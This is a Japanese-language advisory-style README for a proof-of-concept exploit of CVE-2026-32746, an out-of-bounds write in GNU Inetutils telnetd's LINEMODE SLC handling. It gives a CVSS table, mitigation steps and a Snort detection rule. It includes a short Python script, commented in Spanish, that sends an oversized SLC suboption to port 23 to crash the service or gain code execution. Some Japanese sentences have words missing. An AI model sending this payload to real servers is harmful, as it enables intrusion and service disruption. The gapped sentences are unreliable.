
# CVE-2026-32746 の概念実証エクスプロイト GNU Inetutils の telnetd における LINEMODE SLC バッファオーバーフローを介した重大なリモートコード実行の脆弱性に対する概念実証エクスプロイトです。技術分析、CVSS メトリクス、および緩和策のガイダンスを含みます。
重大な脆弱性 | CVSS 9.8 | リモートコード実行!
影響: GNU Inetutils Telnetd (2.7より前のバージョン)
種別: LINEMODE SLC サブオプションハンドラにおける OOB Write
攻撃ベクトル: ネットワーク (ポート23) | 認証不要
影響: Telnetdプロセスの権限でのRCE
GNU Inetutils の telnetd デーモン内の add_slc 関数において、バッファオーバーフローによる領域外書き込み (OOB Write) が特定されました。この欠陥により、リモートの攻撃者が Telnet プロトコルの を操作することで、 することが可能になります。
add_slc (ローカル文字の処理)。攻撃者は、内部バッファを飽和させる 悪意のある Telnet ペイロード を使用して、この脆弱性を悪用できます:
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Repetición de 600 veces
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload entregado. Verificando caída del servicio/RCE...")
⚠️ 警告! このコードは 教育および研究目的のみ です。許可なくシステムで使用することは 違法 です。
| メトリクス | 値 | 説明 |
|---|---|---|
| ベクター | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | リモート、認証不要 |
| スコア | 9.8 (CRITICAL) 🔴 | 機密性、完全性、可用性への高い影響 |
| 公開日 | 2026年3月13日 | 最終更新: 2026年5月5日 |
✅ GNU Inetutils を パッチ適用済みバージョン (2.7以降) に更新する。
🔹 telnetd を無効化 し、SSH に移行する (推奨)。
🔹 ファイアウォールでポート23をブロック する。
🔹 IDS/IPSを設定 して、異常な LINEMODE SLC シーケンスを検出する。
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)